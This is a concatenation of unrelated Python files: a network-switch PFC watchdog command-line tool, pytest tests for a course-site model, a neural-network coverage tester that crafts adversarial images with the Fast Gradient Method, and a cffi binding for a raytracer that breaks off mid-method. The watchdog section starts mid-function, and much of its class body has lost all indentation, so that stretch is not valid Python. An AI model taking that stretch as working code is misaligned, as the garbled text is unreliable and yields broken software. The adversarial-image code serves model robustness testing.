        server_facing_ports = [p[1] for p in db.get_table('VLAN_MEMBER')]
    return server_facing_ports
class PfcwdCli(object):
def __init__(
self, db=None, namespace=None, display=constants.DISPLAY_ALL
):
self.db = None
self.config_db = None
self.multi_asic = multi_asic_util.MultiAsic(
display, namespace, db
)
self.table = []
self.all_ports = []
@multi_asic_util.run_on_multi_asic
def collect_stats(self, empty, queues):
table = []
if len(queues) == 0:
queues = get_all_queues(
self.db,
self.multi_asic.current_namespace,
self.multi_asic.display_option
)
for queue in queues:
stats_list = []
queue_oid = self.db.get(
self.db.COUNTERS_DB, 'COUNTERS_QUEUE_NAME_MAP', queue
)
if queue_oid is None:
continue
stats = self.db.get_all(
self.db.COUNTERS_DB, 'COUNTERS:' + queue_oid
)
if stats is None:
continue
for stat in STATS_DESCRIPTION:
line = stats.get(stat[1], '0') + '/' + stats.get(stat[2], '0')
stats_list.append(line)
if stats_list != ['0/0'] * len(STATS_DESCRIPTION) or empty:
table.append(
[queue, stats.get('PFC_WD_STATUS', 'N/A')] + stats_list
)
self.table += table
def show_stats(self, empty, queues):
del self.table[:]
self.collect_stats(empty, queues)
click.echo(tabulate(
self.table, STATS_HEADER, stralign='right', numalign='right',
tablefmt='simple'
))
@multi_asic_util.run_on_multi_asic
def get_all_namespace_ports(self):
ports = get_all_ports(
self.db, self.multi_asic.current_namespace,
self.multi_asic.display_option
)
self.all_ports.extend(ports)
def get_invalid_ports(self, ports=[]):
if len(ports) == 0:
return []
self.get_all_namespace_ports()
port_set = set(ports)
# "all" is a valid option, remove before performing set diff
port_set.discard("all")
return port_set - set(self.all_ports)
@multi_asic_util.run_on_multi_asic
def collect_config(self, ports):
table = []
if len(ports) == 0:
ports = get_all_ports(
self.db, self.multi_asic.current_namespace,
self.multi_asic.display_option
)
ports_found = False
for port in ports:
config_list = []
config_entry = self.config_db.get_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, port
)
if config_entry is None or config_entry == {}:
continue
ports_found = True
for config in CONFIG_DESCRIPTION:
line = config_entry.get(config[1], config[2])
config_list.append(line)
table.append([port] + config_list)
if not ports_found:
return
poll_interval = self.config_db.get_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, 'GLOBAL'
).get('POLL_INTERVAL')
current_ns = self.multi_asic.current_namespace
asic_namesapce = \
"" if current_ns is None or current_ns == "" else " on {}".format(
current_ns
)
if poll_interval is not None:
click.echo(
"Changed polling interval to {}ms{}".format(
poll_interval, asic_namesapce
)
)
big_red_switch = self.config_db.get_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, 'GLOBAL'
).get('BIG_RED_SWITCH')
if big_red_switch is not None:
click.echo("BIG_RED_SWITCH status is {}{}".format(
big_red_switch, asic_namesapce
))
self.table += table
def config(self, ports):
del self.table[:]
self.collect_config(ports)
click.echo(tabulate(
self.table, CONFIG_HEADER, stralign='right', numalign='right',
tablefmt='simple'
))
def start(self, action, restoration_time, ports, detection_time):
invalid_ports = self.get_invalid_ports(ports)
if len(invalid_ports):
click.echo("Failed to run command, invalid options:")
for opt in invalid_ports:
click.echo(opt)
exit()
self.start_cmd(action, restoration_time, ports, detection_time)
@multi_asic_util.run_on_multi_asic
def start_cmd(self, action, restoration_time, ports, detection_time):
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
all_ports = get_all_ports(
self.db, self.multi_asic.current_namespace,
self.multi_asic.display_option
)
if len(ports) == 0:
ports = all_ports
pfcwd_info = {
'detection_time': detection_time,
}
if action is not None:
pfcwd_info['action'] = action
if restoration_time is not None:
pfcwd_info['restoration_time'] = restoration_time
else:
pfcwd_info['restoration_time'] = 2 * detection_time
click.echo(
"restoration time not defined; default to 2 times "
"detection time: {} ms".format(2 * detection_time)
)
for port in ports:
if port == "all":
for p in all_ports:
self.config_db.mod_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, p, None
)
self.config_db.mod_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, p, pfcwd_info
)
else:
if port not in all_ports:
continue
self.config_db.mod_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, port, None
)
self.config_db.mod_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, port, pfcwd_info
)
@multi_asic_util.run_on_multi_asic
def interval(self, poll_interval):
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
pfcwd_info = {}
if poll_interval is not None:
pfcwd_table = self.config_db.get_table(CONFIG_DB_PFC_WD_TABLE_NAME)
entry_min = 3000
for entry in pfcwd_table:
if("Ethernet" not in entry):
continue
detection_time_entry_value = int(self.config_db.get_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, entry
).get('detection_time'))
restoration_time_entry_value = int(self.config_db.get_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, entry
).get('restoration_time'))
if ((detection_time_entry_value is not None) and
(detection_time_entry_value < entry_min)
):
entry_min = detection_time_entry_value
entry_min_str = "detection time"
if ((restoration_time_entry_value is not None) and
(restoration_time_entry_value < entry_min)
):
entry_min = restoration_time_entry_value
entry_min_str = "restoration time"
if entry_min < poll_interval:
click.echo(
"unable to use polling interval = {}ms, value is "
"bigger than one of the configured {} values, "
"please choose a smaller polling_interval".format(
poll_interval, entry_min_str
), err=True
)
exit(1)
pfcwd_info['POLL_INTERVAL'] = poll_interval
self.config_db.mod_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, "GLOBAL", pfcwd_info
)
@multi_asic_util.run_on_multi_asic
def stop(self, ports):
    """Disable PFC watchdog on the given ports (all ports when none given).

    Stopping a port is implemented by deleting its entry from the PFC_WD
    config table.
    """
    if os.geteuid() != 0:
        exit("Root privileges are required for this operation")
    all_ports = get_all_ports(
        self.db, self.multi_asic.current_namespace,
        self.multi_asic.display_option
    )
    if not ports:
        ports = all_ports
    known_ports = set(all_ports)
    for port in ports:
        if port in known_ports:
            self.config_db.mod_entry(CONFIG_DB_PFC_WD_TABLE_NAME, port, None)
@multi_asic_util.run_on_multi_asic
def start_default(self):
    """Enable PFC watchdog with default settings on all active ports.

    Acts only when DEVICE_METADATA|localhost 'default_pfcwd_status' equals
    "enable".  Timer and poll-interval defaults are scaled up with the
    number of configured ports.
    """
    if os.geteuid() != 0:
        exit("Root privileges are required for this operation")
    status = self.config_db.get_entry('DEVICE_METADATA', 'localhost').get(
        'default_pfcwd_status'
    )
    # Active ports are those with a configured neighbor in Config DB.
    active_ports = natsorted(
        list(self.config_db.get_table('DEVICE_NEIGHBOR').keys())
    )
    if not status or status.lower() != "enable":
        return
    port_num = len(list(self.config_db.get_table('PORT').keys()))
    # Parameter values positively correlate to the number of ports
    # (ceiling of port_num / DEFAULT_PORT_NUM, but at least 1).
    multiply = max(1, (port_num - 1) // DEFAULT_PORT_NUM + 1)
    port_entry = {
        'detection_time': DEFAULT_DETECTION_TIME * multiply,
        'restoration_time': DEFAULT_RESTORATION_TIME * multiply,
        'action': DEFAULT_ACTION
    }
    for port in active_ports:
        self.config_db.set_entry(CONFIG_DB_PFC_WD_TABLE_NAME, port, port_entry)
    self.config_db.mod_entry(
        CONFIG_DB_PFC_WD_TABLE_NAME, "GLOBAL",
        {'POLL_INTERVAL': DEFAULT_POLL_INTERVAL * multiply}
    )
@multi_asic_util.run_on_multi_asic
def counter_poll(self, counter_poll):
    """Enable or disable PFCWD flex-counter polling."""
    if os.geteuid() != 0:
        exit("Root privileges are required for this operation")
    self.config_db.mod_entry(
        "FLEX_COUNTER_TABLE", "PFCWD",
        {'FLEX_COUNTER_STATUS': counter_poll}
    )
@multi_asic_util.run_on_multi_asic
def big_red_switch(self, big_red_switch):
    """Enable or disable BIG_RED_SWITCH mode in the GLOBAL entry."""
    if os.geteuid() != 0:
        exit("Root privileges are required for this operation")
    settings = {}
    if big_red_switch is not None:
        settings['BIG_RED_SWITCH'] = big_red_switch
    self.config_db.mod_entry(CONFIG_DB_PFC_WD_TABLE_NAME, "GLOBAL", settings)
# Show stats
class Show(object):
    """Namespace for the 'show' click group and its subcommands.

    The functions below are click callbacks: the decorators register them
    at class-body execution time, so the class serves only as a grouping
    namespace (see get_pfcwd_clis).
    """
    # Show commands
    @cli.group()
    def show():
        """ Show PFC Watchdog information"""
    # 'show stats [-e] [QUEUES...]' — per-queue watchdog statistics.
    @show.command()
    @multi_asic_util.multi_asic_click_options
    @click.option('-e', '--empty', is_flag=True)
    @click.argument('queues', nargs=-1)
    @clicommon.pass_db
    def stats(db, namespace, display, empty, queues):
        """ Show PFC Watchdog stats per queue """
        # An explicit queue selection overrides the display filter.
        if (len(queues)):
            display = constants.DISPLAY_ALL
        PfcwdCli(db, namespace, display).show_stats(empty, queues)
    # Show config
    @show.command()
    @multi_asic_util.multi_asic_click_options
    @click.argument('ports', nargs=-1)
    @clicommon.pass_db
    def config(db, namespace, display, ports):
        """ Show PFC Watchdog configuration """
        PfcwdCli(db, namespace, display).config(ports)
# Start WD
class Start(object):
    """Namespace for the 'start' command (registered on ``cli`` by the decorators)."""
    @cli.command()
    @click.option(
        '--action', '-a', type=click.Choice(['drop', 'forward', 'alert'])
    )
    @click.option('--restoration-time', '-r', type=click.IntRange(100, 60000))
    @click.argument('ports', nargs=-1)
    @click.argument('detection-time', type=click.IntRange(100, 5000))
    @clicommon.pass_db
    def start(db, action, restoration_time, ports, detection_time):
        """
        Start PFC watchdog on port(s). To config all ports, use all as input.
        Example:
        sudo pfcwd start --action drop ports all detection-time 400 --restoration-time 400
        """
        PfcwdCli(db).start(
            action, restoration_time, ports, detection_time
        )
# Set WD poll interval
class Interval(object):
    """Namespace for the 'interval' command (registered on ``cli`` by the decorators)."""
    @cli.command()
    @click.argument('poll_interval', type=click.IntRange(100, 3000))
    @clicommon.pass_db
    def interval(db, poll_interval):
        """ Set PFC watchdog counter polling interval """
        PfcwdCli(db).interval(poll_interval)
# Stop WD
class Stop(object):
    """Namespace for the 'stop' command (registered on ``cli`` by the decorators)."""
    @cli.command()
    @click.argument('ports', nargs=-1)
    @clicommon.pass_db
    def stop(db, ports):
        """ Stop PFC watchdog on port(s) """
        PfcwdCli(db).stop(ports)
# Set WD default configuration on server facing ports when enable flag is on
class StartDefault(object):
    """Namespace for the 'start_default' command (registered on ``cli``)."""
    @cli.command("start_default")
    @clicommon.pass_db
    def start_default(db):
        """ Start PFC WD by default configurations """
        PfcwdCli(db).start_default()
# Enable/disable PFC WD counter polling
class CounterPoll(object):
    """Namespace for the 'counter_poll' command (registered on ``cli``)."""
    @cli.command('counter_poll')
    @click.argument('counter_poll', type=click.Choice(['enable', 'disable']))
    @clicommon.pass_db
    def counter_poll(db, counter_poll):
        """ Enable/disable counter polling """
        PfcwdCli(db).counter_poll(counter_poll)
# Enable/disable PFC WD BIG_RED_SWITCH mode
class BigRedSwitch(object):
    """Namespace for the 'big_red_switch' command (registered on ``cli``)."""
    @cli.command('big_red_switch')
    @click.argument('big_red_switch', type=click.Choice(['enable', 'disable']))
    @clicommon.pass_db
    def big_red_switch(db, big_red_switch):
        """ Enable/disable BIG_RED_SWITCH mode """
        PfcwdCli(db).big_red_switch(big_red_switch)
def get_pfcwd_clis():
    """Attach every pfcwd command to the click group and return the group."""
    commands = (
        BigRedSwitch().big_red_switch,
        CounterPoll().counter_poll,
        StartDefault().start_default,
        Stop().stop,
        Interval().interval,
        Start().start,
        Show().show,
    )
    for command in commands:
        cli.add_command(command)
    return cli
if __name__ == '__main__':
    # Build the fully wired CLI group, then invoke it as a script entry point.
    cli = get_pfcwd_clis()
    cli()
|
import datetime
from pathlib import Path
import pytest
import dateutil
from naucse import models
TZINFO = dateutil.tz.gettz('Europe/Prague')


@pytest.fixture
def model():
    """Root model built from the bundled test-content fixtures."""
    fixtures_dir = Path(__file__).parent / 'fixtures/test_content'
    return models.Root(fixtures_dir)
def test_run_with_times(model):
    """A run with configured times exposes tz-aware defaults and session times."""
    run = model.runs[2000, 'run-with-times']
    assert run.default_start_time == datetime.time(19, 0, tzinfo=TZINFO)
    assert run.default_end_time == datetime.time(21, 0, tzinfo=TZINFO)
    session = run.sessions['normal-lesson']
    assert session.date == datetime.date(2000, 1, 1)
    assert session.start_time == datetime.datetime(2000, 1, 1, 19, 0,
                                                   tzinfo=TZINFO)
    assert session.end_time == datetime.datetime(2000, 1, 1, 21, 0,
                                                 tzinfo=TZINFO)
def test_run_without_times(model):
    """A run without configured times yields None for the time fields."""
    run = model.runs[2000, 'run-without-times']
    session = run.sessions['normal-lesson']
    assert run.default_start_time is None
    assert run.default_end_time is None
    assert session.date == datetime.date(2000, 1, 1)
    assert session.start_time is None
    assert session.end_time is None
def test_course(model):
    """A plain course has no dates or times at all."""
    course = model.courses['normal-course']
    session = course.sessions['normal-lesson']
    for value in (course.default_start_time, course.default_end_time,
                  session.date, session.start_time, session.end_time):
        assert value is None
|
import argparse
import sys
import os
from datetime import datetime
from tensorflow.keras.models import *
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.datasets import mnist
from tensorflow.keras.applications.vgg16 import VGG16
from tensorflow.keras.preprocessing.image import load_img
from tensorflow.keras.layers import *
from tensorflow.keras import *
from utils import *
from ssc import *
from art.attacks.evasion import FastGradientMethod
from art.estimators.classification import KerasClassifier
# def run_ssc(test_object, outs):
# f_results, cover_layers, _ = ssc_setup (test_object, outs)
# d_advs=[]
# append_in_file (f_results,
# '#ssc runs; #test cases; #adversarial examples; is feasible; is top-1 adversarial example; is top-x adversarial example; condition feature size; L infinity distance; L0 distance; decision layer index; dec feature; #condition layer neurons; new labels; original labels; coverage; local coverage\n')
# tot_decs=0
# if test_object.layer_indices==None:
# # for i in range(1, len(cover_layers)):
# for cl in cover_layers:
# assert not (is_input_layer(test_object.dnn.layers[cl.layer_index - 1]))
# csp=cl.layer.input.shape
# dsp=cl.ssc_map.shape
# if is_dense_layer(cl.layer) or not (csp[1]==dsp[1] and csp[2]==dsp[2]):
# tot_decs+=cl.ssc_map.size
# else:
# ks=cl.layer.kernel_size
# sp=cl.ssc_map.shape
# tot_decs+=((sp[1]-ks[0]+1)*(sp[2]-ks[1]+1)*sp[3])
# else:
# print (test_object.layer_indices, test_object.feature_indices)
# for cl in cover_layers:
# assert not (is_input_layer(test_object.dnn.layers[cl.layer_index - 1]))
# if cl.layer_index in test_object.layer_indices:
# csp=cl.layer.input.shape
# dsp=cl.ssc_map.shape
# if is_dense_layer(cl.layer) or not (csp[1]==dsp[1] and csp[2]==dsp[2]):
# tmp_decs=cl.ssc_map.size
# else:
# ks=cl.layer.kernel_size
# dsp=cl.ssc_map.shape
# tmp_decs=((dsp[1]-ks[0]+1)*(dsp[2]-ks[1]+1)*dsp[3])
# if is_conv_layer(cl.layer):
# if not test_object.feature_indices==None:
# # print ('**', tmp_decs)
# tmp_decs=tmp_decs*(len(test_object.feature_indices)*1.0/dsp[3])
# # print ('**', tmp_decs)
# tot_decs+=tmp_decs
# print ('== Total decisions: {0} ==\n'.format(tot_decs))
# tot_coverage=0.0
# ## define a global attacker
# classifier=KerasClassifier(clip_values=(MIN, -MIN), model=test_object.dnn)
# # print (classifier.__bases__)
# # classifier.run_eagerly = True
# adv_crafter = FastGradientMethod(classifier)
# # print (adv_crafter.__bases__)
# test_cases=[]
# adversarials=[]
# count=0
# print ('== Enter the coverage loop ==\n')
# ite=0
# while True:
# ite+=1
# dec_layer_index, dec_pos=get_ssc_next(cover_layers, test_object.layer_indices, test_object.feature_indices)
# dec_layer=cover_layers[dec_layer_index]
# dec_layer.ssc_map.itemset(dec_pos, False)
# assert dec_layer.prev_layer_index is not None
# cond_layer = test_object.dnn.layers[dec_layer.prev_layer_index]
# if is_padding(dec_pos, dec_layer, cond_layer, post = True):
# print ('padding')
# continue
# cond_cover = np.zeros(cond_layer.output.shape[1:], dtype=bool)
# tot_conds = cond_cover.size
# if is_conv_layer(cond_layer):
# csp = dec_layer.layer.input.shape
# dsp = cond_layer.output.shape
# if (csp[1]==dsp[1] and csp[2]==dsp[2]):
# ks = cond_layer.kernel_size
# tot_conds = ((dsp[1]-ks[0]+1)*(dsp[2]-ks[1]+1)*dsp[3])
# print ('==== Decision layer: {0}, decision pos: {1} ===='.format(dec_layer, dec_pos))
# print ('==== Conditions layer: {0} ====\n'.format(cond_layer.name))
# non_increasing=0
# step_coverage=0
# while not (step_coverage>=1.0 or non_increasing>=10):
# count+=1
# d_min, d_norm, new_image, old_image, old_labels, cond_diff_map = ssc_search(test_object, cond_layer, None, dec_layer, dec_pos, adv_crafter)
# print ('====== #Condition changes: {0}, norm distance: {1} ======\n'.format( d_min, d_norm))
# feasible=(d_min<=test_object.cond_ratio*np.prod(cond_layer.output.shape[1:]) or d_min==1)
# top1_adv_flag=False
# top5_adv_flag=False
# y1s=[]
# y2s=[]
# y1_flag=False
# y2_flag=False
# labels=test_object.labels
# l0_d=None
# top_classes=test_object.top_classes
# inp_ub=test_object.inp_ub
# found_new=True
# if feasible:
# cond_cover=np.logical_or(cond_cover, cond_diff_map)
# covered=np.count_nonzero(cond_cover)
# new_step_coverage=covered*1.0/tot_conds
# if new_step_coverage==step_coverage:
# non_increasing+=1
# found_new=False
# else:
# non_increasing=0
# step_coverage=new_step_coverage
# if feasible and found_new:
# test_cases.append((new_image, old_image))
# if inp_ub==255:
# new_image=new_image.astype('uint8')
# old_image=old_image.astype('uint8')
# diff_image=np.abs(new_image-old_image)
# else:
# new_image_=new_image*255.0/inp_ub
# old_image_=old_image*255.0/inp_ub
# new_image_=new_image_.astype('uint8')
# old_image_=old_image_.astype('uint8')
# diff_image=np.abs(new_image_-old_image_)
# l0_d=np.count_nonzero(diff_image)/(new_image.size*1.0)
# y1s=(np.argsort(test_object.dnn.predict(np.array([new_image]))))[0][-top_classes:]
# y2s=(np.argsort(test_object.dnn.predict(np.array([old_image]))))[0][-top_classes:]
# if y1s[top_classes-1]!=y2s[top_classes-1]: top1_adv_flag=True
# if labels==None: labels=old_labels
# #print (labels, y1s, y2s)
# for label in labels:
# if label in y1s: y1_flag=True
# if label in y2s: y2_flag=True
# if y1_flag!=y2_flag: top5_adv_flag=True
# if top5_adv_flag:
# print ('******** This is an adversarial example ********\n')
# adversarials.append((new_image, old_image))
# test_object.save_adversarial_example (
# (new_image, '{0}-adv-{1}'.format(len(adversarials), y1s[top_classes-1])),
# (old_image, '{0}-original-{1}'.format(len(adversarials), y2s[top_classes-1])),
# diff = (diff_image, '{0}-diff'.format(len(adversarials))),
# directory = outs)
# adv_flag=True
# d_advs.append(d_norm)
# if len(d_advs)%100==0:
# print_adversarial_distribution(d_advs, f_results.replace('.txt', '')+'-adversarial-distribution.txt')
# #elif y1s[0]==y2s[0]:
# # adversarials.append((new_image, old_image))
# # save_adversarial_examples([new_image/(inp_ub*1.0), 't{0}-{1}'.format(len(test_cases), y1s[top_classes-1])], [old_image/(inp_ub*1.0), 't{0}-original-{1}'.format(len(test_cases), y2s[top_classes-1])], None, f_results.split('/')[0])
# elif feasible:
# print ("******** Already found ********\n")
# else:
# print ("******** Not feasible ********\n")
# #print ('f_results: ', f_results)
# f = open(f_results, "a")
# f.write('{0} {1} {2} {3} {4} {5} {6} {7} {8} {9} {10} {11} {12} {13} {14} {15}\n'.format(count, len(test_cases), len(adversarials), feasible, top1_adv_flag, top5_adv_flag, d_min, d_norm, l0_d, dec_layer.layer_index, dec_pos, np.prod (cond_layer.output.shape[1:]), y1s, y2s, tot_coverage+step_coverage/tot_decs, step_coverage))
# f.close()
# #######
# if not feasible: break
# #######
# tot_coverage+=step_coverage/tot_decs
# ## todo: this is a shortcut
# if not np.any(dec_layer.ssc_map):
# print ('all decision features at layer {0} have been covered'.format(dec_layer.layer_index))
# sys.exit(0)
from engine import CoverableLayer
def run_svc(test_object, outs):
    """Symmetric value coverage (SVC) guided testing loop.

    Repeatedly picks a decision position in the DNN's coverable layers,
    uses FGM-guided search (svc_search) to find an input pair exercising
    it, saves any adversarial pair found, and appends one report line per
    attempt to an 'SVC_report' file.  Loops until get_ssc_next stops
    yielding positions (it is expected to terminate the process).
    """
    print ('To run svc\n')
    setup_layer = \
        lambda l, i, **kwds: CoverableLayer (layer = l, layer_index = i, **kwds)
    cover_layers = get_cover_layers (test_object.dnn, setup_layer,
                                     layer_indices = test_object.layer_indices,
                                     activation_of_conv_or_dense_only = True,
                                     exclude_direct_input_succ = True)
    f_results = outs.stamped_filename ('SVC_report', suff = '.txt')
    ## define a global attacker
    classifier = KerasClassifier(clip_values=(MIN, -MIN), model=test_object.dnn)
    adv_crafter = FastGradientMethod(classifier)
    test_cases = []
    adversarials = []
    count = 0
    while True:
        dec_layer_index, dec_pos = get_ssc_next(cover_layers)
        if dec_layer_index == 1 and is_input_layer(test_object.dnn.layers[0]):
            continue
        print ('dec_layer_index', cover_layers[dec_layer_index].layer_index)
        cond_layer = cover_layers[dec_layer_index - 1]
        dec_layer = cover_layers[dec_layer_index]
        cond_cover = np.ones(cond_layer.ssc_map.shape, dtype=bool)
        ## skip if dec_pos is a padding
        if is_padding (dec_pos, dec_layer, cond_layer):
            continue
        cond_pos = np.random.randint(0, cond_cover.size)
        print ('cond, dec layer index: ', cond_layer.layer_index, dec_layer.layer_index)
        print ('dec_layer_index: ', cover_layers[dec_layer_index].layer_index)
        count += 1
        # Small slack above the recorded upper bound of the decision neuron.
        dec_ub = dec_layer.ubs.item(dec_pos) + 0.001
        print ('dec_ub: ', dec_ub)
        d_min, d_norm, new_image, old_image = svc_search(test_object, cond_layer, cond_pos, dec_layer, dec_pos, adv_crafter, dec_ub)
        print ('d_min is', d_min, 'd_norm is', d_norm)
        feasible = (d_min <= test_object.cond_ratio * cond_layer.ssc_map.size or d_min == 1)
        top1_adv_flag = False
        top5_adv_flag = False
        top5b_adv_flag = False
        y1s = []
        y2s = []
        y1_flag = False
        y2_flag = False
        labels = test_object.labels
        l0_d = None
        top_classes = test_object.top_classes
        inp_ub = test_object.inp_ub
        if feasible:
            test_cases.append((new_image, old_image))
            if inp_ub == 255:
                new_image = new_image.astype('uint8')
                old_image = old_image.astype('uint8')
                diff_image = np.abs(new_image - old_image)
            else:
                # Bug fix: diff_image was previously computed only when
                # inp_ub == 255, so normalized inputs raised a NameError
                # below; scale to 8-bit first (mirrors run_ssc).
                new_image_ = (new_image * 255.0 / inp_ub).astype('uint8')
                old_image_ = (old_image * 255.0 / inp_ub).astype('uint8')
                diff_image = np.abs(new_image_ - old_image_)
            l0_d = np.count_nonzero(diff_image) / (new_image.size * 1.0)
            y1s = (np.argsort(test_object.dnn.predict(np.array([new_image]))))[0][-top_classes:]
            y2s = (np.argsort(test_object.dnn.predict(np.array([old_image]))))[0][-top_classes:]
            if y1s[top_classes - 1] != y2s[top_classes - 1]: top1_adv_flag = True
            if not y1s[top_classes - 1] in y2s: top5b_adv_flag = True
            # Bug fix: guard against labels being None (test_object.labels
            # is optional), which previously raised a TypeError here.
            for label in (labels if labels is not None else []):
                if label in y1s: y1_flag = True
                if label in y2s: y2_flag = True
            if y1_flag != y2_flag: top5_adv_flag = True
            if top5_adv_flag:
                print ('found an adversarial example')
                adversarials.append((new_image, old_image))
                save_an_image(new_image / (inp_ub * 1.0), '{0}-adv-{1}.png'.format(len(adversarials), y1s[top_classes - 1]),
                              f_results.split('/')[0])
                save_an_image(old_image / (inp_ub * 1.0), '{0}-original-{1}.png'.format(len(adversarials), y2s[top_classes - 1]),
                              f_results.split('/')[0])
                save_an_image(diff_image / (inp_ub * 1.0), '{0}-diff.png'.format(len(adversarials)),
                              f_results.split('/')[0])
        else:
            print ("not feasible")
        append_in_file (f_results,
                        '{0} {1} {2} {3} {4} {5} {6} {7} {8} {9} {10} {11} {12} {13}\n'
                        .format(count, len(test_cases), len(adversarials),
                                feasible, top1_adv_flag, top5_adv_flag, top5b_adv_flag,
                                d_min, d_norm, l0_d, dec_layer.layer_index,
                                cond_layer.ssc_map.size, y1s, y2s))
|
from cffi import FFI
from PIL import Image
ffi = FFI()
ffi.cdef("""
typedef struct {
double x, y, z;
} point_t;
typedef struct {
double x, y, z;
} vector_t;
typedef struct {
float red, green, blue;
} color_t;
typedef void* coloration;
coloration coloration_color_new(float red, float green, float blue);
coloration coloration_texture_new(char *path);
void coloration_free(coloration);
typedef void* surfacetype;
surfacetype surfacetype_diffuse_new();
surfacetype surfacetype_reflective_new(float reflectivity);
surfacetype surfacetype_refractive_new(float index, float transparency);
void surfacetype_free(surfacetype);
typedef struct {
coloration coloration;
surfacetype surface;
float albedo;
} material_t;
typedef struct {
uint32_t x, y, width, height;
} block_t;
typedef void* scene;
scene scene_new(uint32_t width, uint32_t height,
double fov, double shadow_bias, uint32_t max_recursion_depth);
scene scene_from_json(char *buffer);
void scene_add_sphere(scene, const point_t *center, double radius,
const material_t *material);
void scene_add_plane(scene, const point_t *origin, const vector_t *normal,
const material_t *material);
void scene_add_spherical_light(scene, const point_t *position,
const color_t *color, float intensity);
void scene_add_directional_light(scene, const vector_t *direction,
const color_t *color, float intensity);
void scene_render(scene, const block_t *block, char *buffer, size_t length);
char *scene_get_json(scene);
void scene_free(scene);
void string_free(char *string);
""")
C = ffi.dlopen("./../raytracer/ffi/target/release/raytracer_ffi.dll")
def point(x, y, z):
    """Allocate a C point_t and fill in its coordinates."""
    p = ffi.new("point_t *")
    p.x, p.y, p.z = x, y, z
    return p
def vector(x, y, z):
    """Allocate a C vector_t and fill in its components."""
    v = ffi.new("vector_t *")
    v.x, v.y, v.z = x, y, z
    return v
def color(red, green, blue):
    """Allocate a C color_t from RGB float components."""
    c = ffi.new("color_t *")
    c.red, c.green, c.blue = red, green, blue
    return c
def material(coloration, surface, albedo):
    """Allocate a C material_t from wrapper objects and an albedo value."""
    m = ffi.new("material_t *")
    m.coloration = coloration.get_raw()
    m.surface = surface.get_raw()
    m.albedo = albedo
    return m
def block(x, y, width, height):
    """Allocate a C block_t describing a rectangular render region."""
    b = ffi.new("block_t *")
    b.x, b.y = x, y
    b.width, b.height = width, height
    return b
class Scene(object):
    """Python wrapper over the native raytracer scene handle.

    Owns the underlying C object; use as a context manager so scene_free
    is called exactly once on exit.
    """
    def __init__(self, width, height, obj):
        # Viewport offset within the full image (see set_viewport).
        self.__x = 0
        self.__y = 0
        self.__width = width
        self.__height = height
        # Raw C 'scene' handle; freed in __exit__.
        self.__obj = obj
    @property
    def width(self):
        return self.__width
    @property
    def height(self):
        return self.__height
    def __enter__(self):
        return self
    def __exit__(self, exc_type, exc_value, traceback):
        # Free the native scene and drop the handle so it cannot be reused.
        C.scene_free(self.__obj)
        self.__obj = None
    def add_sphere(self, center, radius, material):
        """Add a sphere; center/material come from the point()/material() helpers."""
        C.scene_add_sphere(self.__obj, center, radius, material)
    def add_plane(self, origin, normal, material):
        """Add an infinite plane through origin with the given normal."""
        C.scene_add_plane(self.__obj, origin, normal, material)
    def add_spherical_light(self, position, color, intensity):
        """Add a point light at position."""
        C.scene_add_spherical_light(self.__obj, position, color, intensity)
    def add_directional_light(self, direction, color, intensity):
        """Add a directional light shining along direction."""
        C.scene_add_directional_light(self.__obj, direction, color, intensity)
    def set_viewport(self, x, y, width, height):
        """Restrict rendering to a sub-rectangle of the full image."""
        self.__x = x
        self.__y = y
        self.__width = width
        self.__height = height
    def render_image(self):
        """Render the current viewport and return it as a PIL Image."""
        pixel_format = "RGBA" #The raytracer only supports one format
        return Image.frombuffer(pixel_format, (self.__width, self.__height),
            self.render_bytes(), "raw", pixel_format, 0, 1)
    def render_bytes(self):
        """Render the current viewport into a raw RGBA byte buffer."""
        bytes_per_pixel = 4
        buffer_len = self.__width * self.__height * bytes_per_pixel
        buffer = ffi.new("char[]", buffer_len)
        view_block = block(self.__x, self.__y, self.__width, self.__height)
        C.scene_render(self.__obj, view_block, buffer, buffer_len)
        return ffi.buffer(buffer)
    def get_json(self):
        """Serialize the scene to JSON bytes.

        The C string is copied by ffi.string() before string_free runs in
        the finally block, so the returned value stays valid.
        """
        json_raw = C.scene_get_json(self.__obj)
        try:
            json_str = ffi.string(json_raw)
            return json_str
        finally:
            C.string_free(json_raw)
    @staticmethod
    def from_json(json):
        """Rebuild a Scene from JSON bytes.

        NOTE(review): width/height are None here, so render_bytes() on
        such a scene would fail — confirm deserialized scenes are only
        used after set_viewport().
        """
        c_json = ffi.new("char[]", json)
        obj = C.scene_from_json(c_json)
        return Scene(None, None, obj)
    @staticmethod
    def create(width, height, fov, shadow_bias, max_recursion_depth):
        """Construct a fresh native scene with the given camera parameters."""
        obj = C.scene_new(width, height, fov, shadow_bias, max_recursion_depth)
        return Scene(width, height, obj)
class Coloration(object):
    """Python wrapper over the native 'coloration' handle.

    Use as a context manager so the underlying C object is freed.
    """

    def __init__(self, obj):
        self.__obj = obj

    @staticmethod
    def color(red, green, blue):
        """Create a uniform-color coloration."""
        return Coloration(C.coloration_color_new(red, green, blue))

    @staticmethod
    def texture(path):
        """Create a texture-backed coloration from an image path."""
        c_path = ffi.new("char[]", str(path).encode())
        return Coloration(C.coloration_texture_new(c_path))

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        C.coloration_free(self.__obj)
        self.__obj = None

    def get_raw(self):
        """Return the raw C handle for passing to native calls."""
        return self.__obj
class SurfaceType(object):
    """Python wrapper over the native 'surfacetype' handle.

    Use as a context manager so the underlying C object is freed.
    """

    def __init__(self, obj):
        self.__obj = obj

    @staticmethod
    def diffuse():
        """Plain diffuse surface."""
        return SurfaceType(C.surfacetype_diffuse_new())

    @staticmethod
    def reflective(reflectivity):
        """Mirror-like surface with the given reflectivity."""
        return SurfaceType(C.surfacetype_reflective_new(reflectivity))

    @staticmethod
    def refractive(index, transparency):
        """Transparent surface with a refractive index and transparency."""
        return SurfaceType(C.surfacetype_refractive_new(index, transparency))

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        C.surfacetype_free(self.__obj)
        self.__obj = None

    def get_raw(self):
